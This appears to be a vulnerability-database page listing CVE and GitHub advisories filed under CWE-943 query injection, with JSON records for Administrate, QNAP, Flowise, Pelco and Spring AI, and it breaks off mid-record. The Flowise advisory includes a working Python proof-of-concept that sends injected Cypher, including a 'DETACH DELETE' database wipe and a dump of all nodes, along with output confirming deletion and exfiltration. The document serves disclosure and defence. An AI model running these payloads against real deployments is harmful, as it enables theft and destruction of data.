Common Weakness Enumeration

CWE-943

Allowed-with-Review

Improper Neutralization of Special Elements in Data Query Logic

Abstraction: Class · Status: Incomplete

The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.

117 vulnerabilities reference this CWE, most recent first.

CVE-2020-5257 (GCVE-0-2020-5257)

Vulnerability from cvelistv5 – Published: 2020-03-13 21:05 – Updated: 2024-08-04 08:22
VLAI
Title
Sort order SQL injection in Administrate
Summary
In Administrate (rubygem) before version 0.13.0, when sorting by attributes on a dashboard, the direction parameter was not validated before being interpolated into the SQL query. This could present a SQL injection if the attacker were able to modify the `direction` parameter and bypass ActiveRecord SQL protections. Whilst this does have a high-impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication. This is patched in wersion 0.13.0.
CWE
  • CWE-943 - Improper Neutralization of Special Elements in Data Query Logic
Assigner
References
Impacted products
Vendor Product Version
thoughtbot administrate Affected: < 0.13.0
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T08:22:09.077Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/thoughtbot/administrate/security/advisories/GHSA-2p5p-m353-833w"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/thoughtbot/administrate/commit/3ab838b83c5f565fba50e0c6f66fe4517f98eed3"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "administrate",
          "vendor": "thoughtbot",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.13.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In Administrate (rubygem) before version 0.13.0, when sorting by attributes on a dashboard, the direction parameter was not validated before being interpolated into the SQL query. This could present a SQL injection if the attacker were able to modify the `direction` parameter and bypass ActiveRecord SQL protections. Whilst this does have a high-impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication. This is patched in wersion 0.13.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-943",
              "description": "CWE-943: Improper Neutralization of Special Elements in Data Query Logic",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-13T21:05:15.000Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/thoughtbot/administrate/security/advisories/GHSA-2p5p-m353-833w"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/thoughtbot/administrate/commit/3ab838b83c5f565fba50e0c6f66fe4517f98eed3"
        }
      ],
      "source": {
        "advisory": "GHSA-2p5p-m353-833w",
        "discovery": "UNKNOWN"
      },
      "title": "Sort order SQL injection in Administrate",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2020-5257",
          "STATE": "PUBLIC",
          "TITLE": "Sort order SQL injection in Administrate"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "administrate",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "\u003c 0.13.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "thoughtbot"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Administrate (rubygem) before version 0.13.0, when sorting by attributes on a dashboard, the direction parameter was not validated before being interpolated into the SQL query. This could present a SQL injection if the attacker were able to modify the `direction` parameter and bypass ActiveRecord SQL protections. Whilst this does have a high-impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication. This is patched in wersion 0.13.0."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-943: Improper Neutralization of Special Elements in Data Query Logic"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/thoughtbot/administrate/security/advisories/GHSA-2p5p-m353-833w",
              "refsource": "CONFIRM",
              "url": "https://github.com/thoughtbot/administrate/security/advisories/GHSA-2p5p-m353-833w"
            },
            {
              "name": "https://github.com/thoughtbot/administrate/commit/3ab838b83c5f565fba50e0c6f66fe4517f98eed3",
              "refsource": "MISC",
              "url": "https://github.com/thoughtbot/administrate/commit/3ab838b83c5f565fba50e0c6f66fe4517f98eed3"
            }
          ]
        },
        "source": {
          "advisory": "GHSA-2p5p-m353-833w",
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2020-5257",
    "datePublished": "2020-03-13T21:05:15.000Z",
    "dateReserved": "2020-01-02T00:00:00.000Z",
    "dateUpdated": "2024-08-04T08:22:09.077Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-19952 (GCVE-0-2018-19952)

Vulnerability from cvelistv5 – Published: 2020-11-02 15:57 – Updated: 2024-09-17 02:58
VLAI
Summary
If exploited, this SQL injection vulnerability could allow remote attackers to obtain application information. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.1.13; versions prior to 5.2.9; versions prior to 5.3.11.
Severity
No CVSS data available.
CWE
  • CWE-20 - Improper Input Validation
  • CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
  • CWE-943 - Improper Neutralization of Special Elements in Data Query Logic
Assigner
References
Impacted products
Vendor Product Version
QNAP Systems Inc. Music Station Affected: unspecified , < 5.1.13 (custom)
Affected: unspecified , < 5.2.9 (custom)
Affected: unspecified , < 5.3.11 (custom)
Create a notification for this product.
Date Public
2020-10-30 00:00
Credits
Independent Security Evaluators
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T11:51:17.957Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.qnap.com/en/security-advisory/qsa-20-10"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Music Station",
          "vendor": "QNAP Systems Inc.",
          "versions": [
            {
              "lessThan": "5.1.13",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            },
            {
              "lessThan": "5.2.9",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            },
            {
              "lessThan": "5.3.11",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Independent Security Evaluators"
        }
      ],
      "datePublic": "2020-10-30T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "If exploited, this SQL injection vulnerability could allow remote attackers to obtain application information. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.1.13; versions prior to 5.2.9; versions prior to 5.3.11."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20 Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-80",
              "description": "CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-943",
              "description": "CWE-943 Improper Neutralization of Special Elements in Data Query Logic",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-11-02T15:57:02.000Z",
        "orgId": "2fd009eb-170a-4625-932b-17a53af1051f",
        "shortName": "qnap"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.qnap.com/en/security-advisory/qsa-20-10"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "QNAP have already fixed the issue in the following Music Station:\nQTS 4.3.3: Music Station 5.1.13 and later\nQTS 4.3.4: Music Station 5.1.13 and later\nQTS 4.3.6: Music Station 5.2.9 and later\nQTS 4.4.3: Music Station 5.3.11 and later"
        }
      ],
      "source": {
        "advisory": "QSA-20-10",
        "discovery": "EXTERNAL"
      },
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@qnap.com",
          "DATE_PUBLIC": "2020-10-30T00:29:00.000Z",
          "ID": "CVE-2018-19952",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Music Station",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "5.1.13"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_value": "5.2.9"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_value": "5.3.11"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "QNAP Systems Inc."
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Independent Security Evaluators"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "If exploited, this SQL injection vulnerability could allow remote attackers to obtain application information. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.1.13; versions prior to 5.2.9; versions prior to 5.3.11."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-20 Improper Input Validation"
                }
              ]
            },
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)"
                }
              ]
            },
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-943 Improper Neutralization of Special Elements in Data Query Logic"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.qnap.com/en/security-advisory/qsa-20-10",
              "refsource": "MISC",
              "url": "https://www.qnap.com/en/security-advisory/qsa-20-10"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "QNAP have already fixed the issue in the following Music Station:\nQTS 4.3.3: Music Station 5.1.13 and later\nQTS 4.3.4: Music Station 5.1.13 and later\nQTS 4.3.6: Music Station 5.2.9 and later\nQTS 4.4.3: Music Station 5.3.11 and later"
          }
        ],
        "source": {
          "advisory": "QSA-20-10",
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "2fd009eb-170a-4625-932b-17a53af1051f",
    "assignerShortName": "qnap",
    "cveId": "CVE-2018-19952",
    "datePublished": "2020-11-02T15:57:02.626Z",
    "dateReserved": "2018-12-07T00:00:00.000Z",
    "dateUpdated": "2024-09-17T02:58:07.767Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-28G4-38Q8-3CWC

Vulnerability from github – Published: 2026-04-16 21:54 – Updated: 2026-04-24 19:40
VLAI
Summary
Flowise: Cypher Injection in GraphCypherQAChain
Details

Summary

The GraphCypherQAChain node forwards user-provided input directly into the Cypher query execution pipeline without proper sanitization. An attacker can inject arbitrary Cypher commands that are executed on the underlying Neo4j database, enabling data exfiltration, modification, or deletion.

Vulnerability Details

Field Value
Affected File packages/components/nodes/chains/GraphCypherQAChain/GraphCypherQAChain.ts
Affected Lines 193-219 (run method)

Prerequisites

To exploit this vulnerability, the following conditions must be met:

  1. Neo4j Database: A Neo4j instance must be connected to the Flowise server
  2. Vulnerable Chatflow Configuration:
  3. A chatflow containing the Graph Cypher QA Chain node
  4. Connected to a Chat Model (e.g., ChatOpenAI)
  5. Connected to a Neo4j Graph node with valid credentials
  6. API Access: Access to the chatflow's prediction endpoint (/api/v1/prediction/{flowId})

vulnerability-diagram-prerequisites

Root Cause

In GraphCypherQAChain.ts, the run method passes user input directly to the chain without sanitization:

async run(nodeData: INodeData, input: string, options: ICommonObject): Promise<string | object> {
    const chain = nodeData.instance as GraphCypherQAChain
    // ...

    const obj = {
        query: input  // User input passed directly
    }

    // ...
    response = await chain.invoke(obj, { callbacks })  // Executed without escaping
}

Impact

An attacker with access to a vulnerable chatflow can:

  1. Data Exfiltration: Read all data from the Neo4j database including sensitive fields
  2. Data Modification: Create, update, or delete nodes and relationships
  3. Data Destruction: Execute DETACH DELETE to wipe entire database
  4. Schema Discovery: Enumerate database structure, labels, and properties

Proof of Concept

poc.py

#!/usr/bin/env python3
"""
POC: Cypher injection in GraphCypherQAChain (CWE-943)

Usage:
  python poc.py --target http://localhost:3000 --flow-id <FLOW_ID> --token <API_KEY>
"""

import argparse
import json
import urllib.request
import urllib.error

def post_json(url, data, headers):
    req = urllib.request.Request(
        url,
        data=json.dumps(data).encode("utf-8"),
        headers={**headers, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:3000")
    ap.add_argument("--flow-id", required=True, help="Chatflow ID with GraphCypherQAChain")
    ap.add_argument("--token", help="Bearer token / API key if required")
    ap.add_argument(
        "--injection",
        default="MATCH (n) RETURN n",
        help="Cypher payload to inject",
    )
    args = ap.parse_args()

    payload = {
        "question": args.injection,
        "overrideConfig": {},
    }

    headers = {}
    if args.token:
        headers["Authorization"] = f"Bearer {args.token}"

    url = args.target.rstrip("/") + f"/api/v1/prediction/{args.flow_id}"

    try:
        status, body = post_json(url, payload, headers)
        print(body if body else f"(empty response, HTTP {status})")
    except urllib.error.HTTPError as e:
        print(e.read().decode("utf-8", errors="replace"))
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    main()

Test Environment Setup

1. Start Neo4j with Docker:

docker run -d \
  --name neo4j-test \
  -p 7474:7474 \
  -p 7687:7687 \
  -e NEO4J_AUTH=neo4j/testpassword123 \
  neo4j:latest

2. Create test data (in Neo4j Browser at http://localhost:7474):

CREATE (a:Person {name: 'Alice', secret: 'SSN-123-45-6789'})
CREATE (b:Person {name: 'Bob', secret: 'SSN-987-65-4321'})
CREATE (a)-[:KNOWS]->(b)

3. Configure Flowise chatflow (see screenshot)

Exploitation Steps

# Data destruction (DANGEROUS)
python poc.py --target http://127.0.0.1:3000 \
  --flow-id <FLOW_ID> --token <API_KEY> \
  --injection "MATCH (n) DETACH DELETE n"

Evidence

Cypher injection reaching Neo4j directly:

$ python poc.py --target http://127.0.0.1:3000 --flow-id bbb330a5-... --token ...
{"text":"Error: All sub queries in an UNION must have the same return column names (line 2, column 16 (offset: 22))\n\"RETURN 1 as ok UNION CALL db.labels() YIELD label RETURN label LIMIT 5\"\n                ^",...}

The error message comes from Neo4j, proving the injected Cypher is executed directly.

Data destruction confirmed:

$ python poc.py ... --injection "MATCH (n) DETACH DELETE n"
{"json":[],...}

Empty result indicates all nodes were deleted.

Sensitive data exfiltration:

$ python poc.py ... --injection "MATCH (n) RETURN n"
{"json":[{"n":{"name":"Alice","secret":"SSN-123-45-6789"}},{"n":{"name":"Bob","secret":"SSN-987-65-4321"}}],...}
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise-components"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41274"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:54:26Z",
    "nvd_published_at": "2026-04-23T22:16:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe GraphCypherQAChain node forwards user-provided input directly into the Cypher query execution pipeline without proper sanitization. An attacker can inject arbitrary Cypher commands that are executed on the underlying Neo4j database, enabling data exfiltration, modification, or deletion.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| Affected File | `packages/components/nodes/chains/GraphCypherQAChain/GraphCypherQAChain.ts` |\n| Affected Lines | 193-219 (run method) |\n\n## Prerequisites\n\nTo exploit this vulnerability, the following conditions must be met:\n\n1. **Neo4j Database**: A Neo4j instance must be connected to the Flowise server\n2. **Vulnerable Chatflow Configuration**:\n   - A chatflow containing the **Graph Cypher QA Chain** node\n   - Connected to a **Chat Model** (e.g., ChatOpenAI)\n   - Connected to a **Neo4j Graph** node with valid credentials\n3. **API Access**: Access to the chatflow\u0027s prediction endpoint (`/api/v1/prediction/{flowId}`)\n\n\u003cimg width=\"1627\" height=\"1202\" alt=\"vulnerability-diagram-prerequisites\" src=\"https://github.com/user-attachments/assets/8069e7df-799c-40cc-908a-ab7587b621d0\" /\u003e\n\n## Root Cause\n\nIn `GraphCypherQAChain.ts`, the `run` method passes user input directly to the chain without sanitization:\n\n```typescript\nasync run(nodeData: INodeData, input: string, options: ICommonObject): Promise\u003cstring | object\u003e {\n    const chain = nodeData.instance as GraphCypherQAChain\n    // ...\n    \n    const obj = {\n        query: input  // User input passed directly\n    }\n    \n    // ...\n    response = await chain.invoke(obj, { callbacks })  // Executed without escaping\n}\n```\n\n## Impact\n\nAn attacker with access to a vulnerable chatflow can:\n\n1. **Data Exfiltration**: Read all data from the Neo4j database including sensitive fields\n2. **Data Modification**: Create, update, or delete nodes and relationships\n3. **Data Destruction**: Execute `DETACH DELETE` to wipe entire database\n4. **Schema Discovery**: Enumerate database structure, labels, and properties\n\n## Proof of Concept\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Cypher injection in GraphCypherQAChain (CWE-943)\n\nUsage:\n  python poc.py --target http://localhost:3000 --flow-id \u003cFLOW_ID\u003e --token \u003cAPI_KEY\u003e\n\"\"\"\n\nimport argparse\nimport json\nimport urllib.request\nimport urllib.error\n\ndef post_json(url, data, headers):\n    req = urllib.request.Request(\n        url,\n        data=json.dumps(data).encode(\"utf-8\"),\n        headers={**headers, \"Content-Type\": \"application/json\"},\n        method=\"POST\",\n    )\n    with urllib.request.urlopen(req, timeout=15) as resp:\n        return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n\ndef main():\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"--target\", required=True, help=\"Base URL, e.g. http://host:3000\")\n    ap.add_argument(\"--flow-id\", required=True, help=\"Chatflow ID with GraphCypherQAChain\")\n    ap.add_argument(\"--token\", help=\"Bearer token / API key if required\")\n    ap.add_argument(\n        \"--injection\",\n        default=\"MATCH (n) RETURN n\",\n        help=\"Cypher payload to inject\",\n    )\n    args = ap.parse_args()\n\n    payload = {\n        \"question\": args.injection,\n        \"overrideConfig\": {},\n    }\n\n    headers = {}\n    if args.token:\n        headers[\"Authorization\"] = f\"Bearer {args.token}\"\n\n    url = args.target.rstrip(\"/\") + f\"/api/v1/prediction/{args.flow_id}\"\n\n    try:\n        status, body = post_json(url, payload, headers)\n        print(body if body else f\"(empty response, HTTP {status})\")\n    except urllib.error.HTTPError as e:\n        print(e.read().decode(\"utf-8\", errors=\"replace\"))\n    except Exception as e:\n        print(f\"Error: {e}\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Test Environment Setup\n\n**1. Start Neo4j with Docker:**\n```bash\ndocker run -d \\\n  --name neo4j-test \\\n  -p 7474:7474 \\\n  -p 7687:7687 \\\n  -e NEO4J_AUTH=neo4j/testpassword123 \\\n  neo4j:latest\n```\n\n**2. Create test data (in Neo4j Browser at http://localhost:7474):**\n```cypher\nCREATE (a:Person {name: \u0027Alice\u0027, secret: \u0027SSN-123-45-6789\u0027})\nCREATE (b:Person {name: \u0027Bob\u0027, secret: \u0027SSN-987-65-4321\u0027})\nCREATE (a)-[:KNOWS]-\u003e(b)\n```\n\n**3. Configure Flowise chatflow** (see screenshot)\n\n### Exploitation Steps\n\n```bash\n# Data destruction (DANGEROUS)\npython poc.py --target http://127.0.0.1:3000 \\\n  --flow-id \u003cFLOW_ID\u003e --token \u003cAPI_KEY\u003e \\\n  --injection \"MATCH (n) DETACH DELETE n\"\n```\n\n### Evidence\n\n**Cypher injection reaching Neo4j directly:**\n```\n$ python poc.py --target http://127.0.0.1:3000 --flow-id bbb330a5-... --token ...\n{\"text\":\"Error: All sub queries in an UNION must have the same return column names (line 2, column 16 (offset: 22))\\n\\\"RETURN 1 as ok UNION CALL db.labels() YIELD label RETURN label LIMIT 5\\\"\\n                ^\",...}\n```\nThe error message comes from Neo4j, proving the injected Cypher is executed directly.\n\n**Data destruction confirmed:**\n```\n$ python poc.py ... --injection \"MATCH (n) DETACH DELETE n\"\n{\"json\":[],...}\n```\nEmpty result indicates all nodes were deleted.\n\n**Sensitive data exfiltration:**\n```\n$ python poc.py ... --injection \"MATCH (n) RETURN n\"\n{\"json\":[{\"n\":{\"name\":\"Alice\",\"secret\":\"SSN-123-45-6789\"}},{\"n\":{\"name\":\"Bob\",\"secret\":\"SSN-987-65-4321\"}}],...}\n```",
  "id": "GHSA-28g4-38q8-3cwc",
  "modified": "2026-04-24T19:40:33Z",
  "published": "2026-04-16T21:54:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41274"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Flowise: Cypher Injection in GraphCypherQAChain"
}

GHSA-2P5P-M353-833W

Vulnerability from github – Published: 2020-03-13 21:05 – Updated: 2021-01-08 20:25
VLAI
Summary
Sort order SQL injection in Administrate
Details

In Administrate (rubygem) before version 0.13.0, when sorting by attributes on a dashboard, the direction parameter was not validated before being interpolated into the SQL query. This could present a SQL injection if the attacker were able to modify the direction parameter and bypass ActiveRecord SQL protections.

Whilst this does have a high-impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication.

This is patched in wersion 0.13.0.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "administrate"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-5257"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-03-13T21:05:20Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "In Administrate (rubygem) before version 0.13.0, when sorting by attributes on a dashboard,\nthe direction parameter was not validated before being interpolated into the SQL query.\nThis could present a SQL injection if the attacker were able to modify the `direction` parameter and bypass ActiveRecord SQL protections.\n\nWhilst this does have a high-impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication.\n\nThis is patched in wersion 0.13.0.",
  "id": "GHSA-2p5p-m353-833w",
  "modified": "2021-01-08T20:25:54Z",
  "published": "2020-03-13T21:05:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thoughtbot/administrate/security/advisories/GHSA-2p5p-m353-833w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5257"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thoughtbot/administrate/commit/3ab838b83c5f565fba50e0c6f66fe4517f98eed3"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-2p5p-m353-833w"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/administrate/CVE-2020-5257.yml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Sort order SQL injection in Administrate"
}

GHSA-37CJ-HCX2-8PV7

Vulnerability from github – Published: 2022-05-24 16:46 – Updated: 2024-04-04 00:43
VLAI
Details

An Improper Neutralization of Special Elements in Query vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which allows an attacker to execute arbitrary system commands.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-7829"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-05-22T20:29:00Z",
    "severity": "HIGH"
  },
  "details": "An Improper Neutralization of Special Elements in Query vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which allows an attacker to execute arbitrary system commands.",
  "id": "GHSA-37cj-hcx2-8pv7",
  "modified": "2024-04-04T00:43:28Z",
  "published": "2022-05-24T16:46:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7829"
    },
    {
      "type": "WEB",
      "url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-44F4-GVWJ-6QG3

Vulnerability from github – Published: 2026-03-27 06:31 – Updated: 2026-03-29 15:36
VLAI
Summary
Spring AI Redis Store has TAG Field Query Injection Through Improper Neutralization of Special Characters
Details

In RedisFilterExpressionConverter of spring-ai-redis-store, when a user-controlled string is passed as a filter value for a TAG field, stringValue() inserts the value directly into the @field:{VALUE} RediSearch TAG block without escaping characters. This issue affects Spring AI: from 1.0.0 before 1.0.5, from 1.1.0 before 1.1.4.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.springframework.ai:spring-ai-redis-store"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0-M5"
            },
            {
              "fixed": "1.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.springframework.ai:spring-ai-redis-store"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0-M1"
            },
            {
              "fixed": "1.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22744"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-29T15:36:29Z",
    "nvd_published_at": "2026-03-27T06:16:38Z",
    "severity": "HIGH"
  },
  "details": "In\u00a0RedisFilterExpressionConverter\u00a0of\u00a0spring-ai-redis-store, when a user-controlled string is passed as a filter value for a TAG field,\u00a0stringValue()\u00a0inserts the value directly into the\u00a0@field:{VALUE}\u00a0RediSearch TAG block without escaping characters. This issue affects Spring AI: from 1.0.0 before 1.0.5, from 1.1.0 before 1.1.4.",
  "id": "GHSA-44f4-gvwj-6qg3",
  "modified": "2026-03-29T15:36:29Z",
  "published": "2026-03-27T06:31:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22744"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spring-projects/spring-ai/commit/707e990c9152aabb9c9226053725efa2ada72223"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/spring-projects/spring-ai"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spring-projects/spring-ai/releases/tag/v1.0.5"
    },
    {
      "type": "WEB",
